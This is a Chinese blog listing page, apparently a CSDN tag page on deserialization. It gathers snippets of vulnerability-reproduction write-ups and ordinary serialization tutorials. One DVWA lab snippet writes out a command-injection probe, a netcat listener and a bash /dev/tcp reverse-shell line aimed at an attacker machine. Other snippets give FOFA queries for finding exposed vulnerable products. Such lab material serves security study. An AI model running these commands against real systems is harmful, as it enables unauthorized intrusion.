反序列化漏洞复现

漏洞复现-druid-任意文件读取】vulfocus/druid-cve_2021_36749

前言:介绍:博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。擅长:对于技术、工具、漏洞原理、黑产打击的研究。C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期
黑色地带(崛起)·2023-11-02 22:18

漏洞复现】某大厂存在信息泄露与逻辑漏洞

0x01漏洞介绍浙江大华技术股份有限公司智能物联综合管理平台是一款基于物联网技术的综合性管理平台,旨在为企业和用户提供智能化、便捷化的物联网解决方案。该平台整合了大华技术在视频监控、数据采集、数据分析等方面的核心技术,实现了对各类物联网设备的统一管理和控制,提高了企业的运营效率和管理水平。该漏洞因为对敏感目录没有做访问限制,以及没有删除默认用户。0x02影响版本浙江大华技术股份有限公司智能物联综合
黑客大佬·2023-11-02 22:16

大厂信息泄露-漏洞复现

目录大唐电信AC简介资产收集漏洞复现修复建议免费领取安全学习资料包!
渗透测试老鸟-九青·2023-11-02 22:15

漏洞复现】74cms任意文件读取

漏洞描述74CMS是一款国内用的比较多招聘网站管理系统(JobBoardCMS),专注于招聘和人力资源领域的网站建设,存在任意文件读取漏洞免责声明技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人
丢了少年失了心1·2023-11-02 17:40

泛微 OA e-cology9 存在 sql 注入

文章目录泛微OAe-cology9存在sql注入1.MinIO简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾泛微OAe-cology9存在sql注入免责声明
sublime88·2023-11-02 14:12

泛微e-office系统存在SQL注入漏洞

泛微e-office系统存在SQL注入漏洞一、泛微简介二、漏洞描述三、影响版本四、fofa查询语句五、漏洞复现免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失
安全攻防赵小龙·2023-11-02 14:36

易思无人值守智能物流系统Sys_ReportFile文件上传漏洞复现

文章目录易思无人值守智能物流系统Sys_ReportFile文件上传漏洞复现0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06修复建议易思无人值守智能物流系统
gaynell·2023-11-02 14:36

panabit日志审计singleuser_action.php任意用户添加漏洞复现

文章目录panabit日志审计singleuser_action.php任意用户添加漏洞复现0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.
gaynell·2023-11-02 14:56

漏洞复现--金蝶云星空 CommonFileServer 任意文件读取

免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负一:漏洞描述金蝶云星空是金蝶集团面向大中型企业的一个核心产品,聚焦多组织,多利润中心的企业。它以“开放、标准、社交”三
芝士土包鼠·2023-11-02 13:47

漏洞复现--用友U8-Cloud upload.jsp任意文件上传

免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责一:漏洞描述U8cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用
芝士土包鼠·2023-11-02 13:17

redis ERR value is not an integer or out of range(increment(key)报错)

1、报错原理使用的RedisTemplate,做读写操作时候,都是要经过序列化和反序列化
乌鱼鸡汤·2023-11-02 11:21

锐捷RG-EW1200G登录绕过漏洞复现

文章目录锐捷RG-EW1200G登录绕过漏洞复现0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.复现0x06修复建议锐捷RG-EW1200G登录绕过漏洞复现
gaynell·2023-11-02 06:26

【C#进阶八】C#中的序列化与反序列化下(二进制序列化、XML序列化及JSON序列化)

文章目录二进制序列化与反序列化序列化与反序列化代码示例运行结果上一篇介绍了XML序列化及JSON序列化,这一篇接着介绍二进制序列化。
智能建造小硕·2023-11-02 06:21

泛微e-office download.php任意文件

建议您关闭”0x03漏洞复现payload:/general/file_f
渗透测试老鸟-九青·2023-11-02 02:50

LT8918L适用于双端口 LVDS 转 MIPIDSI/CSI-2 应用方案

该桥对输入LVDS数据进行反序列化,对数据包进行解码,并将格式化的视频数据流转换为MIPIDSI/CSI-2发射器输出。对于MIPIDSI/CSI-2输出,LT8918L具有一个单端口MIPID
weixin_69065474·2023-11-01 19:57

LT9211C适用于MIPI DSI/CSI-2/双端口 LVDS 和 TTL 之间相互转换

LT9211C对输入MIPI/LVDS/TTL视频数据进行反序列化,对数据包进行解码,并将格式化的视频数据流转换为AP和移动显示面板或
weixin_69065474·2023-11-01 19:27

C# 如何使用 System.Text.Json 启用不区分大小写的属性名称

不区分大小写的属性匹配默认情况下,反序列化会查找JSON与目标对象属性之间区分大小写的属性名称匹配。
心语明洲·2023-11-01 16:15

golang json 反序列化多态记录

funcTest_polymorphic(t*testing.T){body:=`{"vehicles":[{"type":"car","make":"BMW","model":"M3","seatingCapacity":4,"topSpeed":250},{"type":"truck","make":"Volvo","model":"FH","payloadCapacity":40000},{
gitxuzan_·2023-11-01 14:59

golang json 反序列化多态记录

funcTest_polymorphic(t*testing.T){body:=`{"vehicles":[{"type":"car","make":"BMW","model":"M3","seatingCapacity":4,"topSpeed":250},{"type":"truck","make":"Volvo","model":"FH","payloadCapacity":40000},{
gitxuzan_·2023-11-01 14:59

漏洞复现--企望制造ERP系统 RCE

免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负一:漏洞描述企望制造ERP系统是畅捷通公司开发的一款领先的生产管理系统,它以集成化管理为核心设计理念,通过模块化机制,
芝士土包鼠·2023-11-01 11:54

让SOME/IP运转起来——SOME/IP系统设计(上)

SOME/IP中主要定义了:数据的序列化:SOME/IP支持的数据类型,复杂数据的序列化及反序列化方式通信机制:提供Request/Response、Fire&Forget、发布-订阅的通信机制服务发现
经纬恒润·2023-11-01 10:18

漏洞复现】用友OA用户信息泄露

资产确定FOFA""用友U8-OA""漏洞复现G
丢了少年失了心1·2023-11-01 09:57

漏洞复现】锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)

这个漏洞让我想到10年的审查元素大法,确实逻辑有点……0x01影响范围锐捷RG-UAC统一上网行为管理审计系统FOFA互联网资产:title="RG-UAC登录页面"0x02漏洞复现Ctrl+U打开网页源代码通过访问一下路径
Adminxe·2023-11-01 08:17

漏洞复现】锐捷RG-EW1200G登录绕过

资产确定FOFAtitle=锐捷网络漏洞复现1、打开界面输入任意密码进行登录发现
丢了少年失了心1·2023-11-01 08:16

应用层 HTTP协议分析

数据流协议格式请求方法响应状态码请求头部响应头部Cookie/Session抓包分析应用层:通过进程间通信完成网络任务自定制协议自定制协议是程序员在应用层描述描述应用数据的协议,要保证一方在发送时可以构造数据(序列化),一方在接收时能够解析数据(反序列化
敬亭山_·2023-11-01 08:48

golang json格式化自定义日期格式

go的time.Time,在json序列化是默认2006-01-02T15:04:05Z07:00的格式,十分不便,encoding/json包在序列化和反序列化的时候分别调用encode.go下的Marshaler
linqining·2023-11-01 06:07

文件上传与Phar反序列化的摩擦

提示:文章yu写完后,目录可以自动生成,如何生成可参考右边的帮助文档目录前言一、Phar是什么?二、Phar压缩文件的组成三、Phar伪协议四、SWPU2018[SimplePHP]五、[NSSRound#4SWPU]1zweb六、[HSCSEC2023]EASYPHY七、[SWPUCTF2021新生赛]babyunser总结前言提示:这里可以添加本文要记录的大概内容:最近在刷题的时候,连续做到了
Aiwin-Hacker·2023-11-01 04:19

[NSSRound#4] 复现

TypeMessageWeb1zweb直接能非预期读出来flag1zweb(revenge)就是上题的预期解文件上传、反序列化、PHP伪协议index.phpljt="ljt";$this->dky="
ThnPkm·2023-11-01 04:47

JAVA安全--log4j漏洞研究分析

前言:这个漏洞很火,但是自己一直没咋研究过算是抽空跟了下,总结了很多师傅的文章写这篇文章进行记录下自己的学习过程吧log4j漏洞复现本地复现这个很多人写了可直接参考这个https://cloud.tencent.com
goddemon·2023-11-01 03:56

致远OA wpsAssistServlet任意文件上传漏洞复现 [附POC]

文章目录致远OAwpsAssistServlet任意文件上传漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06
gaynell·2023-11-01 00:08

致远OA wpsAssistServlet任意文件读取漏洞复现 [附POC]

文章目录致远OAwpsAssistServlet任意文件读取漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06
gaynell·2023-11-01 00:01

fastjson对象序列化的问题

今天偶然遇到一个fastjson将字符串反序列化为一个对象的时候的问题,就是简单的通过com.alibaba.fastjson.JSON将对象转为字符串,然后再从字符串转换为原类型的对象。
一个有梦想的Java程序员·2023-11-01 00:20

SpringBoot -- 请求数据多态映射(jackson)

文章目录实现方式示例抽象类对象若干实现类测试接口及前端传递请求体接参结果@JsonTypeInfo和@JsonSubTypes其他常用映射方式1__指定对象类型(两种方式)2__自定义序列化、反序列化方式实现方式可以通过
Mingvvv·2023-10-31 23:16

Android 序列化与反序列化

一、概述对象序列化的意思就是将对象的状态转换成字节流,以后可以通过这些值在生成相同状态的对象,对象序列化就是对象持久化的一种实现方法,它是将对象的属性和方法转化为一种序列化的形式用于存储和传输,反序列化就是根据这些保存的信息重建对象的过程
mumuxi_·2023-10-31 22:04

一款针对SpringBootEnv页面进行快速漏洞利用

TODO支持EurekaXStreamdeserializationRCE支持Fastjson内存马注入支持更多可以使用JNDI内存马注入反序列化漏洞支持内存马路径和密码修改........来龙去脉项目是根据
安全大哥·2023-10-31 21:21

Spring Cloud Gateway代码执行漏洞

2022-22947SpringCloudGatewaySpringCloudGatewaySpringBootActuatorGateway和Actuator集成Actuator操作Gateway接口列表漏洞复现
c1o22·2023-10-31 21:47

Nacos反序列化漏洞利用工具v0.5

项目简介刨洞安全@凉风师傅写的一个NacosHessian反序列化漏洞利用工具,目前已更新到v0.5,欢迎Star!
潇湘信安·2023-10-31 21:17

一款Nacos漏洞自动化工具

1、参考GitHub-charonlight/NacosExploitGUI:Nacos漏洞综合利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用0x01前言本工具已经集成
安全大哥·2023-10-31 21:40

Drupal漏洞复现:CVE-2019-6341

近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣前言:Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单
雨笋教育·2023-10-31 18:56

【Nacos未授权访问漏洞(CVE-2021-29441)复现】

文章目录一、声明二、漏洞描述三、漏洞影响范围四、漏洞复现五、修复建议一、声明本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任
一纸-荒芜·2023-10-31 18:21

【Elasticsearch 未授权访问漏洞复现

文章目录一、漏洞描述二、漏洞复现三、修复建议一、漏洞描述ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTfulweb接口。
一纸-荒芜·2023-10-31 18:21

漏洞复现-Apache-文件上传】vulfocus/apache-cve_2017_15715

前言:介绍:博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。擅长:对于技术、工具、漏洞原理、黑产打击的研究。C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期
黑色地带(崛起)·2023-10-31 18:50

CVE-2022-24288:Apache Airflow OS命令注入漏洞复现

目录0x01声明0x02简介0x03漏洞概述0x04影响版本0x05环境搭建1、Docker环境:2、漏洞环境:0x06漏洞复现1、登录airflow2、利用漏洞(1):3、利用漏洞(2):0x07流量分析
Evan Kang·2023-10-31 18:49

【JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现

文章目录一、漏洞描述二、受影响版本三、漏洞复现四、漏洞危害五、修复建议一、漏洞描述进行在公司内部用nessus做漏洞扫描时,发现某台服务器报出这个中危漏洞,后面查资料复现。
一纸-荒芜·2023-10-31 18:12

漏洞复现】酒店宽带运营系统RCE

漏洞描述安美数字酒店宽带运营系统server_ping.php远程命令执行漏洞免责声明技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!资产确定F
丢了少年失了心1·2023-10-31 17:19

CVE-2023-1698:WAGO系统远程代码执行漏洞复现

文章目录WAGO系统远程代码执行漏洞(CVE-2023-1698)复现0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06修复建议WAGO
gaynell·2023-10-31 13:53

移动路由器Cellular Router命令执行漏洞复现 [附POC]

文章目录移动路由器CellularRouter命令执行漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.复现0x06修复建议移动路由器
gaynell·2023-10-31 13:52

QVD-2023-19300:致远M1 usertokenservice反序列化RCE漏洞复现

文章目录致远M1usertokenservice反序列化RCE漏洞(QVD-2023-19300)复现0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造
gaynell·2023-10-31 13:49

信息收集&命令注入&反序列化(dvwa)

信息收集zoomeye钟馗之眼shodan撒旦fofa采用hash搜索标签页上面的小图片http.favicon.hash:-842852785命令注入dvwa的命令执行漏洞利用测试是否存在命令注入127.0.0.1|winver反弹shellkali监听7777端口nc-lvp7777注:测试环境Ubuntu虚拟机dvwa命令注入输入;bash-i>&/dev/tcp/kali的ip地址/777
LztCode·2023-10-31 11:08

Fastjson反序列化漏洞复现(实战案例)

漏洞介绍FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。通俗理解就是:漏洞利用fastjsonautotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过
zxl2605·2023-10-31 10:39
上一页 45 46 47 48 49 50 51 52 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他